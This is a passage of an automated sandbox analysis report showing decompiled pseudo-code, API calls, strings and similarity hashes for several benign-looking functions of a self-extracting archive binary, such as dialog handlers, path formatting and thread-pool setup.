                Uniqueness Score: -1.00%

                Function 00CB9B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E00CB9B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E00CA12D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xcffe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xcffe38), ( *0xcffe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E00CAB943(__eflags,  *( *0xcffe38)));
					_push( *( *0xcffe38));
					_push(E00CADA42(_t25, 0x8e));
					_t22 = E00CA10B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xcffe38));
					goto L13;
				}
				goto L6;
			}












                0x00cb9b8e
                0x00cb9b93
                0x00cb9b98
                0x00cb9b9d
                0x00cb9bb5
                0x00cb9c45
                0x00cb9c47
                0x00000000
                0x00cb9c47
                0x00cb9bbb
                0x00cb9bc1
                0x00cb9c34
                0x00cb9c36
                0x00cb9c3c
                0x00cb9c3f
                0x00000000
                0x00cb9c3f
                0x00cb9bc6
                0x00cb9bda
                0x00000000
                0x00cb9bda
                0x00cb9bcb
                0x00cb9bce
                0x00cb9c2a
                0x00cb9c30
                0x00cb9c14
                0x00cb9c15
                0x00000000
                0x00cb9c15
                0x00cb9bd0
                0x00cb9bd3
                0x00cb9c12
                0x00000000
                0x00cb9c12
                0x00cb9bd8
                0x00cb9be3
                0x00cb9bec
                0x00cb9bf2
                0x00cb9bfe
                0x00cb9c00
                0x00cb9c05
                0x00cb9c07
                0x00000000
                0x00000000
                0x00cb9c0e
                0x00000000
                0x00cb9c0e
                0x00000000

                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CB9C15
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CB9C2A
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CB9C3F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 2894bfa643c37db0f22838fed8b1d3790d6688e43fb314be67c51b65ad9518a0
                • Instruction ID: 89bcc7fcf8e7ca37d2734ed1d622eb9baa8c1b6e96e8396fa1385f489f9af675
                • Opcode Fuzzy Hash: 2894bfa643c37db0f22838fed8b1d3790d6688e43fb314be67c51b65ad9518a0
                • Instruction Fuzzy Hash: C0115133644111AFD6119FA89D49FAA7FA9EF4B700F140015F7029B2B2C7B29E42D72A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CACE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E00CACE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E00CB11FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E00CAFA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E00CAD9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0xf236b0
					_t30 = E00CC4E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E00CACC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xcdd158 +  *_t30 * 0xc; // 0xcd33e0
						E00CC54E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}














                0x00cace52
                0x00cace52
                0x00cace52
                0x00cace53
                0x00cace57
                0x00cace5e
                0x00cace64
                0x00cace74
                0x00cace7a
                0x00cace7e
                0x00cace81
                0x00cace8c
                0x00cace8c
                0x00cace94
                0x00cace97
                0x00caced2
                0x00cace99
                0x00cace99
                0x00cace9c
                0x00caceb1
                0x00caceb2
                0x00000000
                0x00cace9e
                0x00cacea1
                0x00cacea6
                0x00cacea7
                0x00caceb7
                0x00caceba
                0x00cacebc
                0x00cacebd
                0x00cacec2
                0x00cacec2
                0x00cacea1
                0x00cace9c
                0x00cacede
                0x00cacee4
                0x00cacee8
                0x00cacef2
                0x00000000
                0x00cacef8
                0x00cacefe
                0x00cacf07
                0x00cacf0f
                0x00cacf0f
                0x00cace66
                0x00cace66
                0x00cace66
                0x00cace66
                0x00cacf16

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: 6b5750811b860c320c2d7a3a32032aecc0b5653e1ee83bf2e51122e76caca5a2
                • Instruction ID: 292824e291c230cddc4629a5f952161074cafc771c772b7ce10ce5978b9b9de6
                • Opcode Fuzzy Hash: 6b5750811b860c320c2d7a3a32032aecc0b5653e1ee83bf2e51122e76caca5a2
                • Instruction Fuzzy Hash: B521907254030DEEDF21DFA4CC85FEE7BA8EB16704F044026FA2596192E371DA559B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBA0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E00CBA0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E00CA12D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E00CAE90C(_t24, 0xcf5c00,  &_v260);
					E00CAE957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                0x00cba0ba
                0x00cba0be
                0x00cba0c2
                0x00cba0db
                0x00cba14a
                0x00000000
                0x00cba14c
                0x00cba0dd
                0x00cba0e3
                0x00cba144
                0x00000000
                0x00cba144
                0x00cba0e8
                0x00cba0f7
                0x00000000
                0x00cba0f7
                0x00cba0ed
                0x00cba0f0
                0x00cba116
                0x00cba128
                0x00cba135
                0x00cba13a
                0x00cba0fd
                0x00cba0fe
                0x00000000
                0x00cba0fe
                0x00cba0f5
                0x00cba0fb
                0x00000000
                0x00cba0fb
                0x00000000

                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CBA0FE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBA116
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CBA144
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1
                • API String ID: 445417207-3292211884
                • Opcode ID: 79368209124086b8bfa12952b1250d7b82c8fa9ee528a5c22e15f1c3a6a55865
                • Instruction ID: 47b9cf2cb4048394f5486c338e6345d6994be21c4b11e542ef1da6b109770737
                • Opcode Fuzzy Hash: 79368209124086b8bfa12952b1250d7b82c8fa9ee528a5c22e15f1c3a6a55865
                • Instruction Fuzzy Hash: D011C832940219BADB219E6D9D49FFF7B7CEB4A754F010021FA87F3080C6769A5196B2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAB1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E00CAB1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E00CAB4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E00CC0BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E00CC0BB8(_t23);
							if(_t13 == 0) {
								_t14 = E00CC2B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E00CC4DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00CA3E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}











                0x00cab1b8
                0x00cab1bf
                0x00cab1c4
                0x00cab1c7
                0x00cab1ce
                0x00cab1eb
                0x00cab1ef
                0x00cab1fa
                0x00cab1fb
                0x00cab1fc
                0x00cab202
                0x00cab205
                0x00cab20a
                0x00cab20b
                0x00cab20c
                0x00cab215
                0x00cab21f
                0x00cab217
                0x00cab21b
                0x00cab21b
                0x00cab229
                0x00cab22b
                0x00cab230
                0x00cab238
                0x00cab23a
                0x00cab23a
                0x00cab205
                0x00000000
                0x00cab23e
                0x00000000

                APIs
                • _swprintf.LIBCMT ref: 00CAB1DE
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • _wcschr.LIBVCRUNTIME ref: 00CAB1FC
                • _wcschr.LIBVCRUNTIME ref: 00CAB20C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: b904eacc324198538979fc62e1bf56a257dac84b509757260a170705470a603e
                • Instruction ID: 4b10341cd93bbfb0a59b1cb584f738ecd58b1f8107c1401de0feacea54fe8bc2
                • Opcode Fuzzy Hash: b904eacc324198538979fc62e1bf56a257dac84b509757260a170705470a603e
                • Instruction Fuzzy Hash: 8E01F5235003136AAA24AB75DC42E6FA7ACDE97764B50851BFC54C2183FB30DD50D2B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB0326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00CB0326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0xce00e0);
					E00CA6CC9(E00CA6CCE(_t19), 0xce00e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                0x00cb0326
                0x00cb0326
                0x00cb032e
                0x00cb0332
                0x00cb0333
                0x00cb0337
                0x00cb0339
                0x00cb0339
                0x00cb0342
                0x00cb0344
                0x00cb0344
                0x00cb0346
                0x00cb034e
                0x00cb0350
                0x00cb0350
                0x00cb0352
                0x00cb0358
                0x00cb035f
                0x00cb0373
                0x00cb0379
                0x00cb037f
                0x00cb038b
                0x00cb0391
                0x00cb039b
                0x00cb03a7
                0x00cb03a7
                0x00cb03ad
                0x00cb03b5
                0x00cb03bb
                0x00cb03c4

                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CAA865,00000008,00000000,?,?,00CAC802,?,00000000,?,00000001,?), ref: 00CB035F
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CAA865,00000008,00000000,?,?,00CAC802,?,00000000), ref: 00CB0369
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CAA865,00000008,00000000,?,?,00CAC802,?,00000000), ref: 00CB0379
                Strings
                • Thread pool initialization failed., xrefs: 00CB0391
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: e63ea28fd69a556bde7aad076c0d0d75598214c60f41d1b1560225bcfbe6245c
                • Instruction ID: 0ce33770705764ca691ac07d47121c8e96fbfd48ead65042ed3038b964bcac4e
                • Opcode Fuzzy Hash: e63ea28fd69a556bde7aad076c0d0d75598214c60f41d1b1560225bcfbe6245c
                • Instruction Fuzzy Hash: 131186B15017049FC3315F65DCC8AABFBECEB65358F20482EF1EA83211D6716A80CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBC96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CBC96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0xcfce10 = _a12;
				 *0xcfce14 = _a16;
				 *0xce75f4 = _a20;
				if( *0xce75d3 == 0) {
					if( *0xce75d2 == 0) {
						_t16 = E00CBAFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0xce0064, _t25,  *0xce75c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0xce0060, L"RENAMEDLG",  *0xce75d8, E00CBC2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}







                0x00cbc979
                0x00cbc982
                0x00cbc98b
                0x00cbc990
                0x00cbc99d
                0x00cbc9ae
                0x00cbc9b3
                0x00cbc9da
                0x00cbc9ee
                0x00cbc9f3
                0x00000000
                0x00000000
                0x00cbc9d8
                0x00000000
                0x00000000
                0x00cbc9d8
                0x00000000
                0x00cbc9fa
                0x00000000
                0x00cbc9a1
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: 8196fc1eb87d5a6ae6380352f147a5e0120b5dbb7e60a077f81c0f6c8fd17c13
                • Instruction ID: 537f04c4079196a520f3b9448e6d2cf3c32fa63e5b42659a9ff08e0f55972299
                • Opcode Fuzzy Hash: 8196fc1eb87d5a6ae6380352f147a5e0120b5dbb7e60a077f81c0f6c8fd17c13
                • Instruction Fuzzy Hash: 2801D472A09285AFD7009B59EEC0BAFBBE9E745750F010526F552E6230C7719D10DB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC8749, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E00CC8749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00CC3356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00CBDAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00CBDAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xcc3fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00CBE920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00CBDAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00CBDE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00CBDE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00CBDE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00CC8A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00CD0FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00CC7ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00CC7DAB();
